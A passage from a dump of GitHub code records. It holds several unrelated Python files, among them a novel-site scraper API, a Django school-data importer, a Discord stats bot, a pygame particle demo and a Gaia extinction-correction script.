archivo)\n\n","repo_name":"javigp2002/proyectoCUIA","sub_path":"importarAJSON.py","file_name":"importarAJSON.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"7042288481","text":"from config import *\nfrom lib import *\n\ndef get_web_url(url: str):\n    if url[0] != \"/\":\n        url = \"/\" + url\n    return Vars.current_book_type + url.replace(Vars.current_book_type, \"\")\n\n\nclass Response:\n    @staticmethod\n    def get_book_info_by_book_id(book_id: str):\n        if Vars.current_book_type == \"https://www.qbtr.cc\":\n            url = Vars.current_source.url.book_info.format(Vars.current_book_classify_name, book_id)\n        elif Vars.current_book_type == \"http://www.trxs.cc\":\n            url = Vars.current_source.url.book_info.format(Vars.current_book_classify_name, book_id)\n        elif Vars.current_book_type == \"https://www.xbiquge.la\":\n            url = Vars.current_source.url.book_info.format(book_id[:2], book_id)\n        else:\n            url = Vars.current_source.url.book_info.format(book_id)\n        Vars.current_book_id = book_id\n        return lib.utils.get(api_url=url)\n\n    @staticmethod\n    def get_chapter_info_by_chapter_id(chapter_url: str):\n        if Vars.current_book_type == \"http://www.80zw.net\":\n            url = Vars.current_source.url.chapter_info.format(Vars.current_book.book_id, chapter_url)\n        elif Vars.current_book_type == \"https://www.qb5.la\":\n            url = Vars.current_source.url.chapter_info.format(Vars.current_book.book_id, chapter_url)\n        else:\n            url = Vars.current_source.url.chapter_info.format(chapter_url)\n        result = lib.utils.get(api_url=url)\n        return result\n\n    
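    # Each helper above formats a per-source URL template taken from
    # Vars.current_source.url and delegates the HTTP request to lib.utils.get.
    # A hypothetical call (the book id "12345" is an assumed example, not a
    # value taken from this project) would look like:
    #   catalogue_html = Response.get_catalogue_info_by_book_id("12345")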
@staticmethod\n    def get_catalogue_info_by_book_id(book_id: str):\n        return lib.utils.get(api_url=Vars.current_source.url.catalogue_info.format(book_id))\n\n    @staticmethod\n    def get_book_info_by_keyword(method: str, params: dict = None):\n        response = lib.utils.get(method=method, params=params, api_url=Vars.current_source.url.search_info)\n        # return list(zip(\n        #     # response.xpath(Vars.current_book_rule.Search.book_name),\n        #     # response.xpath(Vars.current_book_rule.Search.book_id)\n        # ))\n","repo_name":"VeronicaAlexia/linovel","sub_path":"api/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2005,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"2"}
+{"seq_id":"27010739516","text":"import sys\nimport os\n\n'''\nThis file configures file paths for locating the ACL2 model, setting the\noutput directory etc. and some general options.\n'''\n\n\n###############################################################################\n# File paths and options\n###############################################################################\n\n\n'''\nTop level file name to translate. Likely `x86.lisp` (which is located at\n`books/projects/x86isa/machine`).\n'''\nx86_project_folder = '/Users/patrick/Desktop/x86/temp/sbcl-source/acl2-8.3/books/projects/x86isa/'\ntranslateFile = 'x86.lisp'\ntranslatePath = os.path.join(x86_project_folder, 'machine', translateFile)\n\n\n'''\nPath to the ACL2 executable, which is likely called `saved_acl2`.\nPort on localhost the ACL2 instance listens on for expansion requests.\n'''\nacl2Process = '/Users/patrick/Desktop/x86/temp/sbcl-source/acl2-8.3/saved_acl2'\nacl2Port = 1159\n\n\n'''\nOutput folder for translated files.\n'''\noutputFolder = '/Users/Patrick/Desktop/x86_cleaned/model'\n\n\n'''\nOutput path to the translation of `utilities.lisp`, which is handled manually\nby `generateUtils.py`.\n'''\nutilitiesFile = os.path.join(outputFolder, \"utils.sail\")\n\n\n'''\nOutput path for the file which logs data about the type resolution algorithm\n'''\nunresolvedTypesFile = '/Users/patrick/Desktop/x86_cleaned/unresolvedTypes.txt'\n\n\n'''\n`mbe` forms allow us to choose between translating the `:logic` or `:exec`\nbranches. See tr_mbe in specialTokens.py for more information or:\nhttp://www.cs.utexas.edu/users/moore/acl2/manuals/current/manual/index.html?topic=ACL2____MBE\n'''\nmbe_branch = ':logic'\n#mbe_branch = ':exec'\n\n\n'''\nThe Lisp form `the` translates to a dynamic type check in Sail. Many `the`\nforms use very big numbers to denote the range in which their argument must\nlie, and this clutters up the code. In the absence of the numbers being\nshortened (e.g. by calculating the value or assigning them a name) it is\npossible to skip out the dynamic type check completely. This is because the\ntypes they specify are proved statically by ACL2. It does, however, require\ncorrect implementation of the handwritten functions - so take care if setting\nthis to False.\n'''\ntranslate_the = False\n\n\n'''\nPrinting interactions with the running ACL2 instance can increase the amount\nof terminal output substantially but helps debug problems. 
\n'''\nprint_acl2_interactions = False\n\n\n'''\nCheck all necessary paths have been specified and mbe_branch is well-formed.\n'''\nif any([path is None for path in [acl2Process, outputFolder, unresolvedTypesFile, utilitiesFile]]):\n\tsys.exit(\"Please specify file paths in config_files.py\")\n\nif mbe_branch not in [':logic', ':exec']:\n\tsys.exit(f\"config_files.py: mbe_branch should be either ':logic' or ':exec', not {mbe_branch}\")\n\n\n\n","repo_name":"paddy10663/x86-ACL2-to-Sail","sub_path":"translator/config_files.py","file_name":"config_files.py","file_ext":"py","file_size_in_byte":2769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"7347046652","text":"from django.urls import path\nfrom .views import GenreListAPIView, GenreDetailAPIView\n# from .views import GenreListAPIView, GenreDetailAPIView, user_list, user_detail\n\nfrom .views import *\n\nfrom rest_framework_jwt.views import obtain_jwt_token\n\nurlpatterns = [\n\n    path('login/', obtain_jwt_token),\n\n    path('genres/', GenreListAPIView.as_view()),\n    path('genres/<int:pk>/', GenreDetailAPIView.as_view()),\n\n    path('users/', user_list),\n    path('users/<int:pk>/', user_detail),\n\n    path('comments/', comment_list),\n#    path('users/', user_list),\n#    path('users/<int:pk>/', user_detail),\n\n    path('books/', get_books),\n    path('books/<int:pk>/', BookAPIView.as_view()),\n]","repo_name":"GoldenDrag/Bookdom","sub_path":"back/bdback/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"24577830974","text":"class Solution(object):\n    def findRestaurant(self, list1, list2):\n        anshash = {}\n        uphash = {}\n        downhash = {}\n        l1 = len(list1)\n        l2 = len(list2)\n        mxlen = l1 if l1 > l2 else l2\n        mnidx = 2000\n\n\n        for i in range(mxlen):\n            if i < l1: # make the uphash\n                uphash.setdefault(list1[i], i)\n                if downhash.get(list1[i], None) is not None:\n                    if i + downhash[list1[i]] <= mnidx:\n                        mnidx = i + downhash[list1[i]]\n                        anshash[list1[i]] = mnidx\n\n            if i < l2: # make the downhash\n                downhash.setdefault(list2[i], i)\n                if uphash.get(list2[i], None) is not None:\n                    if i + uphash[list2[i]] <= mnidx:\n                        mnidx = i + uphash[list2[i]]\n                        anshash[list2[i]] = mnidx\n        # keep only the names whose index sum equals the final minimum\n        return [name for name in anshash if anshash[name] == mnidx]\n\nl1 = [\"Shogun\", \"Tapioca Express\", \"Burger King\", \"KFC\"]\nl2 = [\"Piatti\", \"The Grill at Torrey Pines\", \"Hungry Hunter Steakhouse\", \"Shogun\"]\n\nl3 = [\"Shogun\", \"Tapioca Express\", \"Burger King\", \"KFC\"]\nl4 = [\"KFC\", \"Shogun\", \"Burger King\"]\n\nl5 = [\"Shogun\",\"Tapioca Express\",\"Burger King\",\"KFC\"]\nl6 = [\"KFC\",\"Burger King\",\"Tapioca Express\",\"Shogun\"]\n\nprint(Solution().findRestaurant(l5, l6))","repo_name":"digression99/python_study2","sub_path":"leet599.py","file_name":"leet599.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"43084823849","text":"from django.urls import path\nfrom .views import CharacterAPICall, StoryAPICall, StoryViewAPICall\n\napp_name = 'story'\n\nurlpatterns = [\n    path('', StoryAPICall.as_view(), name='story'),\n    path('<int:pk>/', StoryViewAPICall.as_view(), name='story_view'),\n    path('character/', CharacterAPICall.as_view(), 
name='character'),\n]","repo_name":"JayG-5/like_andersen","sub_path":"backend/story/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"74454834927","text":"import abc\nimport enum\nfrom functools import partial\nfrom typing import Any, Generic, TypeVar\n\nimport pydantic\n\n\nFieldType = TypeVar(\"FieldType\")\n\n\nclass InspectableField(pydantic.generics.GenericModel, Generic[FieldType], abc.ABC):\n name: str\n value: FieldType\n inspector_type: str | None = None\n mutable: bool = True\n\n @property\n def label(self):\n return self.name.replace(\"_\", \" \").capitalize()\n\n def set_value(self, value: FieldType) -> FieldType:\n self.value = value\n setattr(self.__class__, self.name, value)\n return value\n\n\nclass TextInspectableField(InspectableField[str]):\n inspector_type = \"text\"\n\n\nclass HiddenInspectableField(InspectableField[FieldType]):\n inspector_type: None = None\n mutable: bool = False\n\n\nclass InfoInspectableField(InspectableField[Any]):\n inspector_type = \"info\"\n mutable: bool = False\n\n\nclass NumberInspectableField(InspectableField[int | float]):\n inspector_type = \"number\"\n\n\nclass EnumInspectableField(InspectableField[enum.Enum]):\n inspector_type = \"select\"\n options: list[tuple[str, Any]] = pydantic.Field(default_factory=list)\n enum_type: type[enum.Enum] = pydantic.Field(default=enum.Enum)\n\n @property\n def options(self):\n return [(option.name, option.value) for option in self.enum_type]\n\n def set_value(self, value: enum.Enum):\n return super().set_value(self.enum_type(value))\n\n\nclass InspectorMixin:\n @property\n def inspectables(self) -> dict[str, InspectableField]:\n field_types = self.field_types()\n excluded_fields = [field_name for field_name, field in field_types.items() if field is HiddenInspectableField]\n inspectables = dict()\n for field in self.__fields__.values():\n if field.name not in excluded_fields:\n factory = field_types.get(field.name, self.default_field_factory(field.type_))\n inspectables[field.name] = factory(name=field.name, value=getattr(self, field.name))\n return inspectables\n\n @property\n def field_types(self) -> dict[str, InspectableField]:\n return {}\n\n def default_field_factory(self, field_type: type) -> type[InspectableField]:\n if issubclass(field_type, enum.Enum):\n return partial(EnumInspectableField, enum_type=field_type)\n if issubclass(field_type, str):\n return TextInspectableField\n if issubclass(field_type, (int, float)):\n return NumberInspectableField\n else:\n return InfoInspectableField\n\n def get_inspectables(self) -> list[InspectableField]:\n return self.inspectables.values()\n\n def get_inspectable(self, name: str) -> InspectableField | None:\n return self.inspectables.get(name)\n\n def set_inspectable(self, name: str, value: Any) -> None:\n inspectable = self.inspectables[name]\n if inspectable.mutable:\n value = self.inspectables[name].set_value(value)\n self.__setattr__(name, value)\n","repo_name":"askepen/sea2023","sub_path":"src/inspector.py","file_name":"inspector.py","file_ext":"py","file_size_in_byte":3001,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"17095221983","text":"import discord\r\nfrom discord.ext import commands\r\nimport requests\r\nfrom api import API\r\n\r\nclass CommandsCog(commands.Cog, name=\"All Commands\"):\r\n def __init__(self, bot):\r\n self.bot = bot\r\n\r\n 
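# Hedged example of how Discord would drive this cog (the player name is\r\n    # made up): the message \"!stats uplay SomePlayer\" ends up calling\r\n    # stats(ctx, \"uplay\", \"SomePlayer\"); any platform other than uplay/psn/xbl\r\n    # is rejected below before the R6Tab API is queried.\r\n    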
@commands.command()\r\n async def stats(self, ctx, *args):\r\n if len(args) < 2:\r\n await ctx.send('Usage: !stats `platform` `username`\\nPlatforms: `uplay`, `psn`, `xbl`')\r\n return\r\n\r\n platforms = ['uplay','psn', 'xbl']\r\n platform = args[0].lower()\r\n username = args[1]\r\n\r\n if platform not in platforms:\r\n await ctx.send('Not a valid platform.\\nValid platforms: `uplay`, `psn`, `xbl`')\r\n return\r\n if not API(platform, username).verify():\r\n await ctx.send(f'Could not find the user `{username}` on the platform `{platform}`\\nValid platforms: `uplay`, `psn`, `xbl`')\r\n return\r\n \r\n stats = API(platform, username).getInfo()\r\n pretty_stat_names = {'level': 'Level',\r\n 'rank': 'Rank',\r\n 'mmr': 'MMR',\r\n 'kd': 'Ranked K/D'}\r\n\r\n embed = discord.Embed(title=stats['p_name'], color=0x2ecc71)\r\n for key, value in stats.items():\r\n if key != 'pfp' and key != 'p_name':\r\n embed.add_field(name=pretty_stat_names[key], value=value, inline=False)\r\n embed.set_image(url=stats['pfp'])\r\n embed.set_footer(text='Made by andreas#8860.\\nData from R6Tab')\r\n await ctx.send(embed=embed)\r\n\r\ndef setup(bot):\r\n bot.add_cog(CommandsCog(bot))","repo_name":"WaddledAway/R6-Stat-bot","sub_path":"r6_stat_bot/r6_stat_bot/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"9213637738","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import, unicode_literals\n\nimport csv\nimport json\nimport os\nimport string\n\nfrom django.conf import settings\nfrom django.contrib.gis.geos import GEOSGeometry\nfrom django.core.management.base import BaseCommand, CommandError\nfrom django.db.models import Count\n\nfrom slugify import slugify\n\nfrom scuole.core.replacements import ISD_REPLACEMENT\nfrom scuole.core.utils import massage_name, remove_charter_c\nfrom scuole.counties.models import County\nfrom scuole.districts.models import District\n\nfrom ...models import Campus, Principal\n\nLOCALE_MAP = {\n \"11\": \"LARGE_CITY\",\n \"12\": \"MID_SIZE_CITY\",\n \"13\": \"SMALL_CITY\",\n \"21\": \"LARGE_SUBURB\",\n \"22\": \"MID_SIZE_SUBURB\",\n \"23\": \"SMALL_SUBURB\",\n \"31\": \"FRINGE_TOWN\",\n \"32\": \"DISTANT_TOWN\",\n \"33\": \"REMOTE_TOWN\",\n \"41\": \"FRINGE_RURAL\",\n \"42\": \"DISTANT_RURAL\",\n \"43\": \"REMOTE_RURAL\",\n}\n\n\nclass Command(BaseCommand):\n help = \"Bootstraps Campus models using TEA, FAST and AskTED data.\"\n\n def add_arguments(self, parser):\n parser.add_argument(\"year\", nargs=\"?\", type=str, default=None)\n\n def handle(self, *args, **options):\n if options[\"year\"] is None:\n raise CommandError(\"A year is required.\")\n\n # path to FAST file where original cleaned up names are stored\n fast_file = os.path.join(settings.DATA_FOLDER, \"fast\", \"fast-campus.csv\")\n\n self.fast_data = self.load_fast_file(fast_file)\n\n # path to TAPR file where campus shapefiles are stored\n campus_file = os.path.join(\n settings.DATA_FOLDER,\n \"tapr\",\n \"reference\",\n \"campus\",\n \"shapes\",\n \"campuses.geojson\",\n )\n\n self.shape_data = self.load_geojson_file(campus_file)\n\n # path to file where new, cleaned up campus names and IDs are stored\n new_campuses = os.path.join(\n settings.DATA_FOLDER,\n \"tapr\",\n \"reference\",\n \"campus\",\n \"updates\",\n options[\"year\"],\n \"new_campuses.csv\",\n )\n\n self.newCampus_data = self.load_newCampus_file(new_campuses)\n\n # path to file where new, cleaned up names 
and IDs of campuses whose\n # names have changed since the last update\n changed_campuses = os.path.join(\n settings.DATA_FOLDER,\n \"tapr\",\n \"reference\",\n \"campus\",\n \"updates\",\n options[\"year\"],\n \"changed_campuses.csv\",\n )\n\n self.changedCampus_data = self.load_changedCampus_file(changed_campuses)\n\n tea_file = os.path.join(\n settings.DATA_FOLDER,\n \"tapr\",\n \"reference\",\n \"campus\",\n \"reference\",\n \"reference.csv\",\n )\n\n with open(tea_file, \"rU\") as f:\n reader = csv.DictReader(f)\n\n for row in reader:\n self.create_campus(row)\n\n self.make_slugs_unique()\n\n def load_fast_file(self, file):\n payload = {}\n\n with open(file, \"r\") as f:\n reader = csv.DictReader(f)\n\n for row in reader:\n payload[row[\"Campus Number\"]] = row\n\n return payload\n\n def load_geojson_file(self, file):\n payload = {}\n\n with open(file, \"r\") as f:\n data = json.load(f)\n\n for feature in data[\"features\"]:\n tea_id = feature[\"properties\"][\"CAMPUS\"]\n payload[tea_id] = feature[\"geometry\"]\n\n return payload\n\n def load_newCampus_file(self, file):\n payload = {}\n\n with open(file, \"rU\") as f:\n reader = csv.DictReader(f)\n\n for row in reader:\n tea_id = row[\"Campus Number\"]\n payload[tea_id] = row\n\n return payload\n\n def load_changedCampus_file(self, file):\n payload = {}\n\n with open(file, \"rU\") as f:\n reader = csv.DictReader(f)\n\n for row in reader:\n tea_id = row[\"Campus Number\"]\n payload[tea_id] = row\n\n return payload\n\n def create_campus(self, campus):\n campus_id = str(int(campus[\"CAMPUS\"]))\n\n # first looks to see if the campus' ID is in both changed campus\n # and FAST data. If it is, it uses the changed name not the FAST name\n if campus_id in self.changedCampus_data and self.fast_data:\n fast_match = self.changedCampus_data[campus_id]\n # then it looks to see if the ID is in the new data\n elif campus_id in self.newCampus_data:\n # if it is it'll use the name in the new campus CSV\n fast_match = self.newCampus_data[campus_id]\n # if it's not in the update or new list, it'l use the FAST name\n elif campus_id in self.fast_data:\n fast_match = self.fast_data[campus_id]\n # if it's not in new, updated or FAST- it gets massaged with our\n # name massager\n else:\n fast_match = {\n \"Campus Name\": massage_name(campus[\"CAMPNAME\"], ISD_REPLACEMENT)\n }\n\n name = remove_charter_c(fast_match[\"Campus Name\"])\n self.stdout.write(\"Creating {}...\".format(name))\n\n low_grade, high_grade = campus[\"GRDSPAN\"].split(\" - \")\n district = District.objects.get(tea_id=campus[\"DISTRICT\"])\n county = County.objects.get(name__iexact=campus[\"CNTYNAME\"])\n\n if campus[\"CFLCHART\"] == \"N\":\n charter = False\n else:\n charter = True\n\n if campus[\"CAMPUS\"] in self.shape_data:\n geometry = GEOSGeometry(json.dumps(self.shape_data[campus[\"CAMPUS\"]]))\n else:\n self.stderr.write(\"No shape data for {}\".format(name))\n geometry = None\n\n instance, _ = Campus.objects.update_or_create(\n tea_id=campus[\"CAMPUS\"],\n defaults={\n \"name\": name,\n \"slug\": slugify(name),\n \"charter\": charter,\n \"coordinates\": geometry,\n \"low_grade\": low_grade,\n \"high_grade\": high_grade,\n \"school_type\": campus[\"GRDTYPE\"],\n \"district\": district,\n \"county\": county,\n },\n )\n\n def make_slugs_unique(self):\n for district in District.objects.all():\n\n models = (\n district.campuses.values(\"slug\")\n .annotate(Count(\"slug\"))\n .order_by()\n .filter(slug__count__gt=1)\n )\n slugs = [i[\"slug\"] for i in models]\n\n campuses = 
district.campuses.filter(slug__in=slugs)\n\n for campus in campuses:\n campus.slug = \"{0}-{1}-{2}\".format(\n campus.slug, campus.low_grade, campus.high_grade\n )\n campus.save()\n","repo_name":"texastribune/scuole","sub_path":"scuole/campuses/management/commands/bootstrapcampuses.py","file_name":"bootstrapcampuses.py","file_ext":"py","file_size_in_byte":6870,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"11557044775","text":"class Solution:\n def minWindow(self, s: str, t: str) -> str:\n #handle edge case in case if empty as shown\n if t == \"\":\n return \" \"\n #Create two windows one with current values and the second with values required\n countT, window = {}, {}\n #initialize our count T\n for cha in t:\n #char may not have been added yet so we use get and assign default values\n countT[cha] = 1 + countT.get(cha, 0)\n #what we current have, what we need\n current, need = 0, len(countT)\n #-1 and -1 for right and left\n result,resultLen = [-1, -1], float(\"infinity\")\n #iterate through every character in s\n left = 0\n for right in range(len(s)):\n #new var to store s at r\n cha = s[right]\n #if c has never been added to window, it will get it \n window [cha]= 1 + window.get(cha,0)\n \n #if we satisfy the condition of what we are looking for\n if cha in countT and window[cha] == countT[cha]:\n current += 1\n #loop to see if the current and need are equal\n while current == need:\n #update the result by calculating size of the window\n if ( right - left + 1) < resultLen:\n result = (left,right)\n resultLen = ( right - left + 1)\n #making the list smaller by popping from the left of our window\n window[s[left]] -= 1\n if s[left] in countT and window[s[left]] < countT[s[left]]:\n current -= 1\n left += 1\n \n left,right = result\n return s[left:right+1] if resultLen != float(\"infinity\") else \"\"\n \n \n \n \n \n \n ","repo_name":"VeldaKiara/Leetcode","sub_path":"76-minimum-window-substring/76-minimum-window-substring.py","file_name":"76-minimum-window-substring.py","file_ext":"py","file_size_in_byte":1969,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"2"} +{"seq_id":"14874188689","text":"#!/usr/bin/env python3\n# example_02.py\n\nimport pygame\nimport particlepy\nimport sys\nimport time\nimport random\n\n\ndef palette_swap(surface: pygame.Surface, old_color, new_color):\n surf_copy = surface.copy()\n img_copy = pygame.Surface(surf_copy.get_size())\n img_copy.fill(new_color)\n surf_copy.set_colorkey(old_color)\n img_copy.blit(surf_copy, (0, 0))\n img_copy.set_colorkey((0, 0, 0))\n return img_copy\n\n\npygame.init()\n\n# pygame config\nSIZE = 800, 800\nSCALE_RATIO = 4\nscreen = pygame.display.set_mode(SIZE)\npygame.display.set_caption(\"ParticlePy example program\")\npygame.mouse.set_visible(False)\n\n# surfaces\ndisplay = pygame.Surface(tuple(item // SCALE_RATIO for item in SIZE))\ndisplay.set_colorkey((0, 0, 0))\n\n# timing\nclock = pygame.time.Clock()\nFPS = 60\n\n# delta time\nold_time = time.time()\ndelta_time = 0\n\n# particle system to manage particles\nparticle_system = particlepy.particle.ParticleSystem()\n\n# load image\nimage = pygame.image.load(\"data/image.png\").convert_alpha()\n\n# main loop\nwhile True:\n # quit window\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n pygame.quit()\n sys.exit()\n\n # delta time\n now = time.time()\n delta_time 
= now - old_time\n old_time = now\n\n # update particle properties\n particle_system.update(delta_time=delta_time, gravity=(0, -3))\n\n # get mouse position\n mouse_pos = tuple(pos // SCALE_RATIO for pos in pygame.mouse.get_pos())\n\n for _ in range(6):\n particle_system.emit(\n particlepy.particle.Particle(shape=particlepy.shape.Image(surface=image, size=(25, 25), alpha=255),\n position=mouse_pos,\n velocity=(random.uniform(-80, 80), random.uniform(-80, 80)),\n delta_radius=0.5))\n\n # render shapes\n particle_system.make_shape()\n\n # render particles\n particle_system.render(surface=display)\n\n # update display\n screen.blit(pygame.transform.scale(palette_swap(display, (255, 255, 255), (90, 90, 90)), SIZE), (-20, 15))\n screen.blit(pygame.transform.scale(display, SIZE), (0, 0))\n pygame.display.update()\n\n screen.fill((22, 27, 34))\n display.fill((0, 0, 0))\n\n clock.tick(60)\n","repo_name":"grimmigerFuchs/ParticlePy","sub_path":"examples/example_02.py","file_name":"example_02.py","file_ext":"py","file_size_in_byte":2412,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"2296496421","text":"# -*- coding: utf-8 -*-\n'''The logic PyVows uses to discover contexts and vows'''\n\nimport inspect\nimport re\n\n\nclass ExecutionPlanner(object):\n def __init__(self, suites, exclusion_patterns, inclusion_patterns):\n self.suites = suites\n if exclusion_patterns and inclusion_patterns:\n raise Exception('Using both exclusion_patterns and inclusion_patterns is not allowed')\n self.exclusion_patterns = set([re.compile(x) for x in exclusion_patterns])\n self.inclusion_patterns = set([re.compile(x) for x in inclusion_patterns])\n\n def plan(self):\n plan = {}\n for suiteName, contextClasses in self.suites.items():\n plan[suiteName] = {\n 'contexts': {}\n }\n for contextClass in contextClasses:\n contextPlan, isRequired = self.plan_context(contextClass, '')\n if isRequired and not self.is_excluded(contextPlan['name']):\n plan[suiteName]['contexts'][contextClass.__name__] = contextPlan\n return plan\n\n def is_excluded(self, name):\n '''Return whether `name` is in `self.exclusion_patterns`.'''\n\n for pattern in self.exclusion_patterns:\n if pattern.search(name):\n return True\n return False\n\n def is_included(self, name):\n '''Return whether `name` is in `self.inclusion_patterns`.'''\n\n if not self.inclusion_patterns:\n return True\n\n for pattern in self.inclusion_patterns:\n if pattern.search(name):\n return True\n return False\n\n def plan_context(self, contextClass, idBase):\n context = {\n 'name': contextClass.__name__,\n 'id': idBase + ('.' if idBase else '') + contextClass.__name__,\n 'contexts': {},\n 'vows': []\n }\n\n special_names = set(['setup', 'teardown', 'topic'])\n if hasattr(contextClass, 'ignored_members'):\n special_names.update(contextClass.ignored_members)\n\n # remove any special methods\n contextMembers = [\n (name, value) for name, value in inspect.getmembers(contextClass)\n if name not in special_names and not name.startswith('_')\n ]\n\n context['vows'] = [\n name for name, vow in contextMembers\n if (inspect.ismethod(vow) or inspect.isfunction(vow))\n and self.is_included(context['id'] + '.' 
+ name)\n and not self.is_excluded(name)\n ]\n\n subcontexts = [\n (name, subcontext) for name, subcontext in contextMembers\n if inspect.isclass(subcontext) and not self.is_excluded(name)\n ]\n\n for name, subcontext in subcontexts:\n subcontextPlan, subcontextContainsIncludedSubcontexts = self.plan_context(subcontext, context['id'])\n if self.is_included(subcontextPlan['id']) or subcontextContainsIncludedSubcontexts:\n context['contexts'][name] = subcontextPlan\n\n if self.inclusion_patterns:\n contextRequiredBecauseItContainsVowsOrSubcontexts = bool(context['contexts']) or bool(context['vows'])\n else:\n contextRequiredBecauseItContainsVowsOrSubcontexts = True\n\n return context, contextRequiredBecauseItContainsVowsOrSubcontexts\n","repo_name":"heynemann/pyvows","sub_path":"pyvows/runner/executionplan.py","file_name":"executionplan.py","file_ext":"py","file_size_in_byte":3307,"program_lang":"python","lang":"en","doc_type":"code","stars":135,"dataset":"github-code","pt":"2"} +{"seq_id":"40222488991","text":"from logger_init import init_logger\n\n\ndef add_step(value, step):\n logger = init_logger(\"add_step\")\n value_list = str.split(value, \";\")\n logger.debug(value_list)\n step_list = str.split(step, \";\")\n for i in value_list:\n if i.find(\"=\") == -1:\n value_list.remove(i)\n for i in step_list:\n if i.find(\"=\") == -1:\n step_list.remove(i)\n logger.debug(value_list)\n\n for index, elem in enumerate(value_list):\n logger.debug(str.split(elem, \"=\"))\n start_value = str.split(elem, \"=\")[1]\n old_val = start_value\n step_to_add = str.split(step_list[index], \"=\")[1]\n\n if not any(c.isalpha() for c in step_to_add) \\\n and not any(c.isalpha() for c in start_value):\n if step_list[index].find(\"-\") == -1:\n start_value = \" \" + str(float(start_value)\n + float(step_to_add))\n else:\n start_value = \" \" + str(float(start_value)\n - float(step_to_add))\n else:\n start_value += step_to_add\n\n start_value += \";\"\n value_list[index] = str.replace(value_list[index], old_val, start_value)\n\n logger.info(\"End adding step values to value result: \" + ''.join(value_list))\n return ''.join(value_list)\n\n","repo_name":"marwin1991/ComplexityEstimator","sub_path":"complexity_estimator_by_pz/step_counter.py","file_name":"step_counter.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"74454826927","text":"\"\"\"\nCreated on Wed Jul 24 18:42:29 2019\n\nApplication of (Green + Lallement) combined map to Gaia data. \n\n@author: Skevja\n\"\"\"\n\nimport numpy as np \nfrom astropy.table import Table\nfrom astropy.coordinates import SkyCoord\nimport astropy.units as u\nfrom dustmaps.bayestar import BayestarQuery\nimport time \n\nt1 = time.time()\n\ntable_name = 'gaia_example_trans_r'\n\nprint('Reading data...',end=' ')\nt = Table.read(''.join((table_name,'.csv')))\n\nprint('ok.\\nCreating coordinates...',end=' ')\ncoords = SkyCoord(t['lon']*u.deg,t['lat']*u.deg,\n distance=t['d']*u.pc,frame='galactic')\n\nprint('ok.\\nGetting extinction...',end=' ')\nbayestar = BayestarQuery(max_samples=1)\nA_v = 2.742*bayestar(coords)\n\nprint('ok.\\nColour transformations...',end=' ' )\n# Transformation coefficients can be found at http://stev.oapd.inaf.it/cgi-bin/cmd\n# (after you submit a request for some isochrone, there will a be a small table \n# at the new page). Just use Gaia passbands. 
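# The per-band extinctions below are simply these tabulated coefficients\n# times A_v; e.g. for A_v = 1 mag they give A_g ≈ 0.836, A_bp ≈ 1.083 and\n# A_rp ≈ 0.634.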
\n\nA_g = 0.83627*A_v\nA_bp = 1.08337*A_v\nA_rp = 0.63439*A_v\n# This was some old check, probably not needed, extinction must be positive all the time. \nA_g[A_g < 0] = 0 \nA_bp[A_bp < 0] = 0 \nA_rp[A_rp < 0] = 0 \n\nprint('ok.\\nSaving data...',end=' ')\n# And save the table with new columns\nt['phot_g_mean_mag_0g'] = np.subtract(t['phot_g_mean_mag'],A_g)\nt['phot_bp_mean_mag_0g'] = np.subtract(t['phot_bp_mean_mag'],A_bp)\nt['phot_rp_mean_mag_0g'] = np.subtract(t['phot_rp_mean_mag'],A_rp)\nt['M_G_0g'] = np.subtract(t['M_G'],A_g)\nt['M_BP_0g'] = np.subtract(t['M_BP'],A_bp)\nt['M_RP_0g'] = np.subtract(t['M_RP'],A_rp)\nt['A_g_g'] = A_g\nt['A_bp_g'] = A_bp\nt['A_rp_g'] = A_rp\n\n# We combine two maps: when A=0 in Green map, we use extinction from Lallement. \n# G\nt['phot_g_mean_mag_0gl'] = t['phot_g_mean_mag_0g']\nt['phot_g_mean_mag_0gl'][t['A_g_g']==0] = t['phot_g_mean_mag_0l']\nt['M_G_0gl'] = t['M_G_0g']\nt['M_G_0gl'][t['A_g_g']==0] = t['M_G_0l']\n# BP\nt['phot_bp_mean_mag_0gl'] = t['phot_bp_mean_mag_0g']\nt['phot_bp_mean_mag_0gl'][t['A_bp_g']==0] = t['phot_bp_mean_mag_0l']\nt['M_BP_0gl'] = t['M_BP_0g']\nt['M_BP_0gl'][t['A_bp_g']==0] = t['M_BP_0l']\n# RP\nt['phot_rp_mean_mag_0gl'] = t['phot_rp_mean_mag_0g']\nt['phot_rp_mean_mag_0gl'][t['A_rp_g']==0] = t['phot_rp_mean_mag_0l']\nt['M_RP_0gl'] = t['M_RP_0g']\nt['M_RP_0gl'][t['A_rp_g']==0] = t['M_RP_0l']\n\nt.write(''.join((table_name,'_r.csv')),overwrite=True)\n\nprint('ok.\\nDone.')\n\nprint(round((time.time()-t1)/60,2), 'min ==', round((time.time()-t1)/3600,2), 